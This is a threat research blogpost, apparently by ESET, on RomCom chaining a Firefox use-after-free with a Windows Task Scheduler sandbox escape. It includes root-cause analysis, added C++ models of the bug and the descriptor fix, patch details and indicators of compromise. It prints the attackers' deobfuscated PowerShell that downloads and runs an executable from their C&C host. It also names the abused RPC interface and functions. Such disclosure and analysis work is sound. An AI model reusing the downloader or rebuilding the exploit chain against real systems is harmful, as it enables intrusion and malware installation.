RomCom exploits Firefox and Windows zero days in the wild


ESET researchers discovered a previously unknown vulnerability in Mozilla products, exploited in the wild by the Russia-aligned group RomCom. This is at least the second time that RomCom has been caught exploiting a significant zero-day vulnerability in the wild, after the abuse of CVE-2023-36884 via Microsoft Word in June 2023.

This critical vulnerability, assigned CVE-2024-9680 with a CVSS score of 9.8, allows vulnerable versions of Firefox, Thunderbird, and the Tor Browser to execute code in the restricted context of the browser. Chained with another previously unknown vulnerability in Windows, assigned CVE-2024-49039 with a CVSS score of 8.8, arbitrary code can be executed in the context of the logged-in user. In a successful attack, if a victim browses to a web page containing the exploit, an adversary can run arbitrary code – without any user interaction required – which in this case led to the installation of RomCom’s eponymous backdoor on the victim’s computer.

Key points of this blogpost:

  • On October 8th, 2024, ESET researchers discovered a previously unknown zero-day vulnerability in Mozilla products being exploited in the wild.
  • Analysis of the exploit led to the discovery of the vulnerability, now assigned CVE-2024-9680: a use-after-free bug in the animation timeline feature in Firefox. Mozilla patched the vulnerability on October 9th, 2024.
  • Further analysis revealed another zero-day vulnerability in Windows: a privilege escalation bug, now assigned CVE-2024-49039, that allows code to run outside of Firefox’s sandbox. Microsoft released a patch for this second vulnerability on November 12th, 2024.
  • Successful exploitation attempts delivered the RomCom backdoor, in what looks like a widespread campaign.

RomCom profile

RomCom (also known as Storm-0978, Tropical Scorpius, or UNC2596) is a Russia-aligned group that conducts both opportunistic campaigns against selected business verticals and targeted espionage operations. The group’s focus has shifted to include espionage operations collecting intelligence, in parallel with its more conventional cybercrime operations. The backdoor used by the group is capable of executing commands and downloading additional modules to the victim’s machine.

Table 1 shows the sectors targeted, according to our research, by RomCom in 2024. This highlights that the group is engaged in espionage but also in cybercrime operations.

Table 1. RomCom victims in 2024

| Vertical and region | Purpose | First seen |
|---|---|---|
| Governmental entity in Ukraine | Espionage | 2024-01 |
| Pharmaceutical sector in the US | Cybercrime | 2024-03 |
| Legal sector in Germany | Cybercrime | 2024-03 |
| Insurance sector in the US | Cybercrime | 2024-04 |
| Defense sector in Ukraine | Espionage | 2024-08 |
| Energy sector in Ukraine | Espionage | 2024-08 |
| Governmental entities in Europe | Espionage | 2024-08 |
| Worldwide targeting – Firefox exploit | Unknown | 2024-10 |

Compromise chain

The compromise chain is composed of a fake website that redirects the potential victim to the server hosting the exploit, and should the exploit succeed, shellcode is executed that downloads and executes the RomCom backdoor – an example of which is depicted in Figure 1. While we don’t know how the link to the fake website is distributed, if the page is reached using a vulnerable browser, a payload is dropped and executed on the victim’s machine with no user interaction required. Finally, a JavaScript redirection is performed using window.location.href after a few seconds, giving the exploit time to run.

Figure 1. Exploit chain to compromise the victim

From October 10th, 2024 to October 16th, 2024, just after the first vulnerability was patched, we found other C&C servers hosting the exploit. They used a recurring naming scheme for their fake servers by adding the prefix or suffix redir or red to a legitimate domain, sometimes also changing its top-level domain (TLD), as shown in Table 2. The redirection at the end of the exploitation attempt took the victims to the legitimate website at the original domain name, presumably to avoid raising the targets’ suspicions.

Table 2. Fake servers redirecting to the exploit

| First seen | Fake server | Final redirect to | Redirect website purpose |
|---|---|---|---|
| 2024-10-10 | redircorrectiv[.]com | correctiv.org | Nonprofit independent newsroom. |
| 2024-10-14 | devolredir[.]com | devolutions.net | Remote access and password management solutions. |
| 2024-10-15 | redirconnectwise[.]cloud | connectwise.com | MSP technology and IT management software. |
| 2024-10-16 | redjournal[.]cloud | connectwise.com | |

If a victim using a vulnerable browser visits a web page serving this exploit, the vulnerability is triggered and shellcode is executed in a content process. The shellcode is composed of two parts: the first retrieves the second from memory and marks the containing pages as executable, while the second implements a PE loader based on the open-source project Shellcode Reflective DLL Injection (RDI).

The loaded library implements a sandbox escape for Firefox that leads to downloading and executing the RomCom backdoor on the victim’s computer. The backdoor is staged at a C&C server located at journalctd[.]live, correctiv[.]sbs, or cwise[.]store, depending on the sample.

According to our telemetry, from October 10th, 2024 to November 4th, 2024, potential victims who visited websites hosting the exploit were located mostly in Europe and North America, as shown in Figure 2. The number of potential targets runs from a single victim per country to as many as 250, according to ESET telemetry.

Figure 2. Heatmap of potential victims

CVE-2024-9680: Use-after-free in Firefox animation timeline

On October 8th, 2024, we found interesting files used to deliver the RomCom backdoor, hosted on the server 1drv.us[.]com controlled by the threat actor. The exploits target a use-after-free vulnerability in Firefox animation timelines, allowing an attacker to achieve code execution in a content process. During our investigation, we analyzed the files referenced in Table 3.

Table 3. Files related to the exploit

| Name | Description |
|---|---|
| main-128.js | JavaScript file containing the exploit for versions of Firefox from 106 to 128. |
| main-129.js | JavaScript file containing the exploit for versions of Firefox from 129 to 131. |
| main-tor.js | JavaScript file containing the exploit for Tor Browser versions 12 and 13. |
| script.js | JavaScript file used to generate a CAPTCHA. |
| utils.js | JavaScript file containing helper functions, e.g., to convert data types, or to get the OS type or browser version. |
| animation0.html | HTML iframe loaded by the exploit to trigger the use-after-free vulnerability. |
| index.html | HTML page loading the exploit and redirecting to a legitimate website after a few seconds. |

Timestamps related to these files indicate that they were created on October 3rd, 2024 and made available online; however, the threat actor might have been in possession of this exploit earlier than this.

We reported the vulnerability to Mozilla soon after discovery, with the following timeline of events:

  • 2024-10-08: Discovery and initial analysis.
  • 2024-10-08: Vulnerability reported to Mozilla.
  • 2024-10-08: Vulnerability acknowledged by Mozilla.
  • 2024-10-09: CVE-2024-9680 assigned by Mozilla Corporation.
  • 2024-10-09: Vulnerability patched in Firefox, Security Advisory 2024-51.
  • 2024-10-09: Vulnerability patched in Tor Browser with release 13.5.7.
  • 2024-10-10: Vulnerability patched in Tails with release 6.8.1.
  • 2024-10-10: Vulnerability patched in Thunderbird, Security Advisory 2024-52.

We would like to thank the team at Mozilla for being very responsive and highlight their impressive work to release a patch within a day.

Mozilla and the Tor Project released a patch that fixes the vulnerability in the following versions:

  • Firefox 131.0.2
  • Firefox ESR 115.16.1
  • Firefox ESR 128.3.1
  • Tor Browser 13.5.7
  • Tails 6.8.1
  • Thunderbird 115.16
  • Thunderbird 128.3.1
  • Thunderbird 131.0.1

During the preparation of this blogpost, independent researcher Dimitri Fourny released a detailed analysis of the vulnerability on November 14th, 2024.

Root cause analysis

The main-<Firefox version>.js first checks the exact version of the browser, and determines its exploitability by checking some specific objects’ offsets and sizes for an affected version. If these checks pass, it proceeds to add an HTML iframe into the exploit page, implemented in animation0.html. The latter creates four HTML div elements identified respectively as target0 to target3, but most importantly it defines a getter function for the Object.prototype’s then property as shown in Figure 3. This function will trigger the use-after-free vulnerability as explained below. Note that the comments (in dark green) are from the exploit authors; this could indicate that the exploit was still in a development stage or that the threat actor bought it.

Figure 3. The JavaScript exploit defines the then property’s getter function on each object, triggering a use-after-free vulnerability

After some initial heap spraying, the prepare function creates four Animation objects, one for each div element previously created, as illustrated in Figure 4. These animation objects are handled by an AnimationTimeline object.

Figure 4. The exploit code creates animation objects for div elements

During the document animation timeline, the test function is called, which pauses and gets the ready property of the first and second animation objects. As stated in the documentation, the ready property returns a Promise that resolves when the animation is ready to be played. Calling the then method on the promise causes the getter function shown in Figure 3 to be called. Essentially, this function increments a global flag variable and once it reaches 2, the first animation object (anim0) is cancelled, and all the div elements are removed. The call to the rm0 function (shown in Figure 3) sets the animation objects to null in order to free them, which triggers the use-after-free vulnerability. This function also does some heap feng shui and, in the initially discovered exploit, calls the getInfo function responsible for achieving code execution.

In the meantime, as the animation0.html document is being refreshed, the Tick method of its AnimationTimeline object is called periodically. As seen in Figure 5, this method iterates over the different animation objects present in the animation timeline and appends animations to be removed to a local array variable called animationsToRemove.

Figure 5. In AnimationTimeline::Tick, animation objects to be removed are appended to the local array variable animationsToRemove

The bug lies in that, while iterating over the different animation objects of the animation timeline, the Tick method of the Animation object is called, which can lead to the freeing of the current animation object, resulting in handling a dangling pointer. While debugging the exploit, we observed a sequence of calls that eventually ended up in the getter function explained above, as illustrated in Figure 6 and Figure 7.

Figure 6. Call stack of the animation being cancelled by the getter function called via the Animation::Tick method

Figure 7. The Animation::PauseAt method ends up calling the getter function

The getter function calls Animation::Cancel, which in turn calls AnimationTimeline::RemoveAnimation. Then, the animation objects anim0 and anim1 are set to null in order for them to get freed. When AnimationTimeline::Tick then iterates over the array animationsToRemove (line 74 in Figure 5), AnimationTimeline::RemoveAnimation will manipulate a dangling pointer of an Animation object that was already removed, as shown in Figure 8.

Figure 8. Call stack of the crash in AnimationTimeline::RemoveAnimation while manipulating a dangling pointer

After freeing the animations in the rm0 function, the exploit proceeds with more heap management in order to control the objects that will replace the freed animations, and finally, the getInfo function is called, as seen in Figure 9.

Figure 9. Exploit code function rm0 triggers the use-after-free bug and exploits it

Without going into too much detail about the exploit code, its author abused div objects and their attributes as well as ImageData objects to leak properties of the latter, as observed in Figure 10.

Figure 10. Exploit code getInfo function attempts to leak an ImageData object

Then, the exploit code proceeds to manipulate ArrayBuffer objects so as to leak the address of an arbitrary JavaScript object (known as an addrof primitive) and abuse the Firefox JIT compiler to execute the first shellcode component in the context of a content process, as illustrated in Figure 11. This technique is explained in great detail in this blogpost.

Figure 11. The exploit code abuses the Firefox JIT compiler to execute shellcode

Mozilla patched the vulnerability in Firefox 131.0.2, Firefox ESR 128.3.1, and Firefox ESR 115.16.1 on October 9th, 2024. Essentially, the pointers to the animation objects handled by the timeline are now implemented through reference-counting pointers (RefPtr), as suggested by the diff, which prevents the animations from being freed, since AnimationTimeline::Tick will still hold a reference to them.
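The root cause and the fix reduce to a small model. The C++ below is an added example, not Firefox source: the class and method names mirror the ones above, but the reference-counted Animation, the RefPtr stand-in, the live-object registry and the RunScenario driver are this example's own simplifications, and the JS getter reached through Animation::Tick and PauseAt is collapsed into a callback.

```cpp
// Constructed model (not Firefox source) of the bug described above and of the RefPtr fix: a
// tick re-enters script, the script cancels an animation and drops the last reference to it,
// and the timeline's deferred-removal list then points at freed memory unless it holds a
// strong reference of its own.
#include <algorithm>
#include <functional>
#include <set>
#include <utility>
#include <vector>

// Live-object registry so the vulnerable path can *detect* a dangling pointer instead of
// dereferencing it (which would be undefined behaviour).
static std::set<const void*> gLiveAnimations;

template <class T>
class RefPtr {  // minimal stand-in for Mozilla's RefPtr: owns one reference
 public:
  RefPtr() = default;
  RefPtr(T* p) : mPtr(p) { if (mPtr) mPtr->AddRef(); }
  RefPtr(const RefPtr& o) : RefPtr(o.mPtr) {}
  RefPtr& operator=(const RefPtr& o) { RefPtr t(o); std::swap(mPtr, t.mPtr); return *this; }
  ~RefPtr() { if (mPtr) mPtr->Release(); }
  T* get() const { return mPtr; }
  T* operator->() const { return mPtr; }
 private:
  T* mPtr = nullptr;
};

class AnimationTimeline;
class Animation {
 public:
  explicit Animation(AnimationTimeline* tl) : mTimeline(tl) { gLiveAnimations.insert(this); }
  ~Animation() { gLiveAnimations.erase(this); }
  void AddRef() { ++mRefCnt; }
  void Release() { if (--mRefCnt == 0) delete this; }
  std::function<void()> mOnTick;  // Animation::Tick -> PauseAt -> "ready" -> JS "then" getter
  bool mPaused = false;           // a paused animation no longer needs ticks
  void Tick() { if (mOnTick) mOnTick(); }
  bool NeedsTicks() const { return !mPaused; }
  void Cancel();                  // Animation::Cancel -> AnimationTimeline::RemoveAnimation
 private:
  int mRefCnt = 0;
  AnimationTimeline* mTimeline;
};

class AnimationTimeline {
 public:
  void AddAnimation(Animation* a) { mAnimations.push_back(a); }
  void RemoveAnimation(Animation* a) {  // the page's crash site when a is dangling
    mAnimations.erase(std::remove_if(mAnimations.begin(), mAnimations.end(),
                                     [a](const RefPtr<Animation>& p) { return p.get() == a; }),
                      mAnimations.end());
  }
  // Models AnimationTimeline::Tick; returns how many animationsToRemove entries were already
  // freed when the removal loop reached them (0 means no use-after-free).
  int Tick(bool useRefPtrFix) {
    std::vector<Animation*> rawToRemove;            // pre-fix: nsTArray<Animation*>
    std::vector<RefPtr<Animation>> strongToRemove;  // fix: the array itself holds a reference
    std::vector<Animation*> order;                  // mAnimationOrder: raw, non-owning
    for (auto& p : mAnimations) order.push_back(p.get());
    for (Animation* a : order) {
      a->Tick();  // may re-enter script, which may cancel *another* animation and drop its refs
      if (a->NeedsTicks()) continue;
      if (useRefPtrFix) strongToRemove.push_back(a); else rawToRemove.push_back(a);
    }
    int dangling = 0;
    for (auto& a : strongToRemove) RemoveAnimation(a.get());  // a is kept alive by the array
    for (Animation* a : rawToRemove) {
      if (!gLiveAnimations.count(a)) { ++dangling; continue; }  // UAF in the real code
      RemoveAnimation(a);
    }
    return dangling;
  }
 private:
  std::vector<RefPtr<Animation>> mAnimations;  // owning, like the timeline's mAnimations
};
void Animation::Cancel() { mTimeline->RemoveAnimation(this); }

// Two paused animations on one timeline, both held by script; returns the dangling count.
int RunScenario(bool useRefPtrFix) {
  AnimationTimeline timeline;
  RefPtr<Animation> anim0 = new Animation(&timeline), anim1 = new Animation(&timeline);
  int flag = 0;
  // The exploit's then getter: its second call cancels anim0, then rm0 drops the script's refs.
  auto thenGetter = [&] { if (++flag == 2) { anim0->Cancel(); anim0 = nullptr; anim1 = nullptr; } };
  for (RefPtr<Animation> a : {anim0, anim1}) {
    a->mPaused = true;  // the exploit's "test" function pauses them first
    a->mOnTick = thenGetter;
    timeline.AddAnimation(a.get());
  }
  return timeline.Tick(useRefPtrFix);  // 1 with raw pointers, 0 with the RefPtr fix
}
```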

Shellcode analysis

Both shellcodes are stored in the JavaScript exploit file main-<Firefox version>.js. The first one is dynamically created as an array of float numbers while the second one is stored as a huge array of bytes.

Egghunting shellcode

This first shellcode simply retrieves the second shellcode by searching in memory for a hardcoded magic value of 0x8877665544332211, changes its memory protection to read-write-execute (RWX), and executes the code located at this address.

Reflective loader shellcode

This second shellcode is the compiled version of the Shellcode RDI project, which enables a DLL to be loaded. The constants used in the shellcode were not changed by the threat actor (see https://github.com/monoxgas/sRDI/blob/master/Native/Loader.cpp#L367 vs. the constants shown in Figure 12).

Figure 12. The constants used in the public Shellcode RDI project remained unchanged

The shellcode simply loads an embedded library whose sole purpose is to escape the restrictions of Firefox’s sandboxed content process.

CVE-2024-49039: Privilege escalation in Windows Task Scheduler

The loaded library (SHA1: ABB54C4751F97A9FC1C9598FED1EC9FB9E6B1DB6), named PocLowIL by its developers and compiled on October 3rd, 2024, implements a sandbox escape from the untrusted process level of the content process to a medium level. Essentially, the library makes use of an undocumented RPC endpoint, which should not have been callable from an untrusted process level, to launch a hidden PowerShell process that downloads a second stage from a C&C server.

The timeline of the vulnerability disclosure is the following:

  • 2024-10-08: As part of our initial report to Mozilla for CVE-2024-9680, we also provided what we believed to be a sandbox escape.
  • 2024-10-14: Mozilla’s security team confirmed the sandbox escape and deemed the vulnerability to be tied to a Windows security flaw. They advised us that they had contacted the Microsoft Security Response Center (MSRC) to assess the vulnerability.
  • 2024-11-12: Microsoft released an advisory for CVE-2024-49039 and its corresponding patch through the update KB5046612. The vulnerability was also independently found by Vlad Stolyarov and Bahare Sabouri of Google’s Threat Analysis Group, as mentioned in KB5046612.

Root cause analysis

The sandbox escape code resides in the relatively small main function of the library. It makes use of an undocumented RPC endpoint, as illustrated in Figure 13.

Figure 13. The PocLowIL library prepares to interact with a task-related endpoint

The function proceeds to populate undocumented structures and calls NdrClientCall2 three times. The first parameter passed to this function, pStubDescriptor, is a MIDL_STUB_DESC structure whose RpcInterfaceInformation member points to an interface identified by the GUID 33D84484-3626-47EE-8C6F-E7E98B113BE1. This interface is implemented in the Windows library WPTaskScheduler.dll, loaded by schedsvc.dll, hosted in the process of the task scheduler service (svchost.exe).

According to our analysis of this interface, the sandbox escape code calls the following functions:

  • s_TaskSchedulerCreateSchedule
  • s_TaskSchedulerExecuteSchedule
  • s_TaskSchedulerDeleteSchedule (used only for cleanup)

Using RpcView and after partially reversing some structures, we figured out the main structures, as illustrated in Figure 14.

Figure 14. The main structures used to create a scheduled task through the RPC interface

After applying these structures in IDA Pro, we obtained a clearer overview of the task, as seen in Figure 15.

Figure 15. IDA Pro pseudocode view of the sandbox escape code

Based on the code, the malicious library creates a scheduled task that will run an arbitrary application at medium integrity level, allowing the attackers to elevate their privileges on the system and break out of the sandbox. This is possible due to the lack of restrictions imposed on the security descriptor applied to the RPC interface during its creation, as illustrated in Figure 16.

Figure 16. Permissive security descriptor applied to the RPC interface

The renamed variable interface_security_descriptor, used when RpcServerRegisterIf3 is called, has the following value: D:P(A;;GA;;;S-1-15-2-1)(A;;GA;;;WD). According to the Security Descriptor Definition Language (SDDL), it allows everyone (WD) to communicate with the RPC interface and call its procedures regardless of their integrity level.

Exploitation

In this case, the threat actor created a task named firefox.exe that will launch conhost.exe in headless mode in order to hide the child process window. The deobfuscation of the rest of the command line (shown in Figure 15) revealed the PowerShell code seen in Figure 17.

$a=$env:public + '\\public';
Invoke-WebRequest https://journalctd[.]live/JfWb4OrQPLh -o $a;
sleep 15;
Rename-Item $a ($a = ($a + '.exe')) # $env:public\public.exe
Start-Process $a;
sleep 10;
Rename-Item $a ($a = ($a -replace 'public.e', 'epublic.e')) # $env:public\epublic.exe
Start-Process $a

Figure 17. PowerShell code downloading a next-stage component

An executable is downloaded from https://journalctd[.]live/JfWb4OrQPLh, stored in the %PUBLIC% folder as public.exe, and run. After 10 seconds, it is renamed as epublic.exe and run again.

Brief patch analysis

The patched version of WPTaskScheduler.dll (version 10.0.19041.5129) released with KB5046612 makes use of a more complex security descriptor, as shown in Figure 18.

Figure 18. The security descriptor introduced by the patch is more restrictive

The new security descriptor is:

D:(A;;GRGWGX;;;SY)(A;;GRGWGX;;;LS)(A;;GR;;;NS)(A;;GR;;;IU)S:(ML;;NWNXNR;;;ME)

Breaking down the string reveals the following rule logic:

  • the system (SY) and local service (LS) accounts are granted read, write, and execute access,
  • the network service (NS) account and interactive users (IU) are granted only read access,
  • lastly, objects below medium integrity level (ME) are denied read, write, and execute access.

The new restrictions imposed by the updated security descriptor prevent the privilege escalation and render the sandbox escape code obsolete.
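As an added example (not ESET's or Microsoft's code), the following C++ parses the two SDDL strings quoted above, expands each ACE, and checks the two properties that decide this bug: whether any allow ACE names a trustee every caller satisfies, and whether a mandatory label fences off callers below medium integrity. The struct and function names and the alias tables are this example's own assumptions; only the rights and trustee codes that appear on this page are mapped.

```cpp
// Constructed SDDL reader (not Microsoft code) for the two interface security descriptors
// quoted on this page; it expands each ACE so the pre- and post-patch difference is explicit.
#include <map>
#include <string>
#include <vector>

struct Ace {
  std::string type;    // "A" = access allowed, "ML" = system mandatory label
  std::string rights;  // right codes as written, e.g. "GRGWGX"
  std::string sid;     // trustee alias (WD, SY, ...) or literal SID (S-1-15-2-1)
};

struct SecurityDescriptor {
  bool daclProtected = false;  // "D:P": the DACL is protected from inheritance
  std::vector<Ace> dacl, sacl;
};

// Splits "(A;;GA;;;WD)(A;;GA;;;S-1-15-2-1)" into ACEs; each is type;flags;rights;objguid;inhguid;sid.
static std::vector<Ace> ParseAces(const std::string& s) {
  std::vector<Ace> out;
  for (size_t open = s.find('('); open != std::string::npos; open = s.find('(', open + 1)) {
    size_t close = s.find(')', open);
    if (close == std::string::npos) break;
    std::vector<std::string> f(1);
    for (char c : s.substr(open + 1, close - open - 1)) {
      if (c == ';') f.emplace_back(); else f.back() += c;
    }
    if (f.size() == 6) out.push_back({f[0], f[2], f[5]});
  }
  return out;
}

SecurityDescriptor ParseSddl(const std::string& sddl) {
  SecurityDescriptor sd;
  size_t d = sddl.find("D:"), s = sddl.find("S:");
  if (d != std::string::npos) {
    std::string dacl = sddl.substr(d + 2, s == std::string::npos ? std::string::npos : s - d - 2);
    sd.daclProtected = !dacl.empty() && dacl[0] == 'P';
    sd.dacl = ParseAces(dacl);
  }
  if (s != std::string::npos) sd.sacl = ParseAces(sddl.substr(s + 2));
  return sd;
}

// Expands the two-letter right codes used on this page into their Win32 names.
std::string ExpandRights(const std::string& r) {
  static const std::map<std::string, std::string> kNames = {
      {"GA", "GENERIC_ALL"}, {"GR", "GENERIC_READ"}, {"GW", "GENERIC_WRITE"}, {"GX", "GENERIC_EXECUTE"},
      {"NW", "NO_WRITE_UP"}, {"NX", "NO_EXECUTE_UP"}, {"NR", "NO_READ_UP"}};
  std::string out;
  for (size_t i = 0; i + 1 < r.size(); i += 2) {
    auto it = kNames.find(r.substr(i, 2));
    out += (out.empty() ? "" : "|");
    out += (it == kNames.end() ? r.substr(i, 2) : it->second);
  }
  return out;
}

// True when an allow ACE names a trustee that every caller satisfies: Everyone (WD) or
// ALL APPLICATION PACKAGES (S-1-15-2-1, alias AC). This is what let the sandboxed content
// process reach the task scheduler interface before the patch.
bool OpenToAnyCaller(const SecurityDescriptor& sd) {
  for (const Ace& a : sd.dacl)
    if (a.type == "A" && (a.sid == "WD" || a.sid == "AC" || a.sid == "S-1-15-2-1")) return true;
  return false;
}

// True when the SACL carries a mandatory label at `level` that denies execute to lower levels.
bool HasIntegrityFloor(const SecurityDescriptor& sd, const std::string& level) {
  for (const Ace& a : sd.sacl)
    if (a.type == "ML" && a.sid == level && a.rights.find("NX") != std::string::npos) return true;
  return false;
}

// The two descriptors quoted on this page: before (WPTaskScheduler.dll) and after KB5046612.
const char* const kBeforePatch = "D:P(A;;GA;;;S-1-15-2-1)(A;;GA;;;WD)";
const char* const kAfterPatch =
    "D:(A;;GRGWGX;;;SY)(A;;GRGWGX;;;LS)(A;;GR;;;NS)(A;;GR;;;IU)S:(ML;;NWNXNR;;;ME)";
```

The same reader can be pointed at any interface descriptor recovered from a binary to flag the "Everyone / ALL APPLICATION PACKAGES with GENERIC_ALL and no integrity label" combination.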

Conclusion

Chaining together two zero-day vulnerabilities armed RomCom with an exploit that requires no user interaction. This level of sophistication shows the threat actor’s will and means to obtain or develop stealthy capabilities. ESET shared detailed findings with Mozilla, following our coordinated vulnerability disclosure process soon after discovery. Mozilla released a blogpost about how they reacted to the disclosure and were able to release a fix within 25 hours, which is very impressive in comparison to industry standards.

For any inquiries about our research published on WeLiveSecurity, please contact us at threatintel@eset.com.

ESET Research offers private APT intelligence reports and data feeds. For any inquiries about this service, visit the ESET Threat Intelligence page.

IoCs

A comprehensive list of indicators of compromise and samples can be found in our GitHub repository.

Files

| SHA-1 | Filename | Detection | Description |
|---|---|---|---|
| A4AAD0E2AC1EE0C8DD25968FA4631805689757B6 | utils.js | JS/Exploit.Agent.NSF | RomCom Firefox exploit. |
| CA6F8966A3B2640F49B19434BA8C21832E77A031 | main-tor.js | JS/Exploit.Agent.NSE | RomCom Firefox exploit. |
| 21918CFD17B378EB4152910F1246D2446F9B5B11 | main-128.js | JS/Exploit.Agent.NSE | RomCom Firefox exploit. |
| 703A25F053E356EB6ECE4D16A048344C55DC89FD | main-129.js | JS/Exploit.Agent.NSE | RomCom Firefox exploit. |
| ABB54C4751F97A9FC1C9598FED1EC9FB9E6B1DB6 | PocLowIL.dll | Win64/Runner.AD | RomCom Firefox sandbox escape. |
| A9D445B77F6F4E90C29E385264D4B1B95947ADD5 | PocLowIL.dll | Win64/Runner.AD | RomCom Tor browser sandbox escape. |

Network

| IP | Domain | Hosting provider | First seen | Details |
|---|---|---|---|---|
| 194.87.189[.]171 | journalctd[.]live | Aeza International LTD | 2024-10-08 | RomCom second-stage C&C server. |
| 178.236.246[.]241 | correctiv[.]sbs | AEZA INTERNATIONAL LTD | 2024-10-09 | RomCom second-stage C&C server. |
| 62.60.238[.]81 | cwise[.]store | AEZA INTERNATIONAL LTD | 2024-10-15 | RomCom second-stage C&C server. |
| 147.45.78[.]102 | redircorrectiv[.]com | AEZA INTERNATIONAL LTD | 2024-10-10 | RomCom exploit delivery C&C server. |
| 46.226.163[.]67 | devolredir[.]com | AEZA INTERNATIONAL LTD | 2024-10-14 | RomCom exploit delivery C&C server. |
| 62.60.237[.]116 | redirconnectwise[.]cloud | AEZA INTERNATIONAL LTD | 2024-10-15 | RomCom exploit delivery C&C server. |
| 62.60.237[.]38 | redjournal[.]cloud | AEZA INTERNATIONAL LTD | 2024-10-16 | RomCom exploit delivery C&C server. |
| 194.87.189[.]19 | 1drv.us[.]com | AEZA INTERNATIONAL LTD | 2024-10-08 | RomCom malware delivery C&C server. |
| 45.138.74[.]238 | economistjournal[.]cloud | AEZA INTERNATIONAL LTD | 2024-10-16 | RomCom exploit redirection C&C server. |
| 176.124.206[.]88 | N/A | AEZA INTERNATIONAL LTD | 2024-10-08 | RomCom second-stage C&C server. |

MITRE ATT&CK techniques

This table was built using version 16 of the MITRE ATT&CK framework.

| Tactic | ID | Name | Description |
|---|---|---|---|
| Resource Development | T1583 | Acquire Infrastructure | RomCom sets up VPSes and buys domain names. |
| | T1587.001 | Develop Capabilities: Malware | RomCom develops malware in multiple programming languages. |
| | T1587.004 | Develop Capabilities: Exploits | RomCom may develop exploits used for initial compromise. |
| | T1588.003 | Obtain Capabilities: Code Signing Certificates | RomCom obtains valid code-signing certificates to sign its malware. |
| | T1588.005 | Obtain Capabilities: Exploits | RomCom may obtain exploits used for initial compromise. |
| | T1588.006 | Obtain Capabilities: Vulnerabilities | RomCom may obtain information about vulnerabilities it uses for targeting victims. |
| | T1608 | Stage Capabilities | RomCom stages malware on multiple delivery servers. |
| Initial Access | T1189 | Drive-by Compromise | RomCom compromises victims through a user visiting a website hosting an exploit. |
| Execution | T1053.005 | Scheduled Task/Job: Scheduled Task | RomCom creates a scheduled task using RPC to execute the next-stage downloader. |
| Persistence | T1546.015 | Event Triggered Execution: Component Object Model Hijacking | The RomCom backdoor hijacks DLLs loaded by explorer.exe or wordpad.exe for persistence. |
| Privilege Escalation | T1068 | Exploitation for Privilege Escalation | RomCom exploits a vulnerability to escape the Firefox sandbox. |
| Defense Evasion | T1622 | Debugger Evasion | The RomCom backdoor detects debuggers by registering an exception handler. |
| | T1480 | Execution Guardrails | The RomCom backdoor checks whether the system state is suitable for execution. |
| | T1027.011 | Obfuscated Files or Information: Fileless Storage | The RomCom backdoor is stored encrypted in the registry. |
| | T1553.002 | Subvert Trust Controls: Code Signing | The RomCom backdoor weakens security mechanisms by using trusted code-signing certificates. |
| Credential Access | T1555.003 | Credentials from Password Stores: Credentials from Web Browsers | The RomCom backdoor collects passwords, cookies, and sessions using a browser stealer module. |
| | T1552.001 | Unsecured Credentials: Credentials In Files | The RomCom backdoor collects passwords using a file reconnaissance module. |
| Discovery | T1087 | Account Discovery | The RomCom backdoor collects username, computer, and domain data. |
| | T1518 | Software Discovery | The RomCom backdoor collects information about installed software and versions. |
| | T1614 | System Location Discovery | The RomCom backdoor checks for a specific keyboard layout ID (KLID). |
| Lateral Movement | T1021 | Remote Services | The RomCom backdoor creates SSH tunnels to move laterally within compromised networks. |
| Collection | T1560 | Archive Collected Data | The RomCom backdoor stores data in a ZIP archive for exfiltration. |
| | T1185 | Man in the Browser | The RomCom backdoor steals browser cookies, history, and saved passwords. |
| | T1005 | Data from Local System | The RomCom backdoor collects specific file types based on file extensions. |
| | T1114.001 | Email Collection: Local Email Collection | The RomCom backdoor collects files with .msg, .eml, and .email extensions. |
| | T1113 | Screen Capture | The RomCom backdoor takes screenshots of the victim’s computer. |
| Command and Control | T1071.001 | Standard Application Layer Protocol: Web Protocols | The RomCom backdoor uses HTTP or HTTPS as a C&C protocol. |
| | T1573.002 | Encrypted Channel: Asymmetric Cryptography | The RomCom backdoor encrypts communication using SSL certificates. |
| Exfiltration | T1041 | Exfiltration Over Command-and-Control Channel | The RomCom backdoor exfiltrates data using the HTTPS C&C channel. |
| Impact | T1565 | Data Manipulation | RomCom manipulates systems and steals data. |
| | T1657 | Financial Theft | RomCom compromises companies for financial gain. |
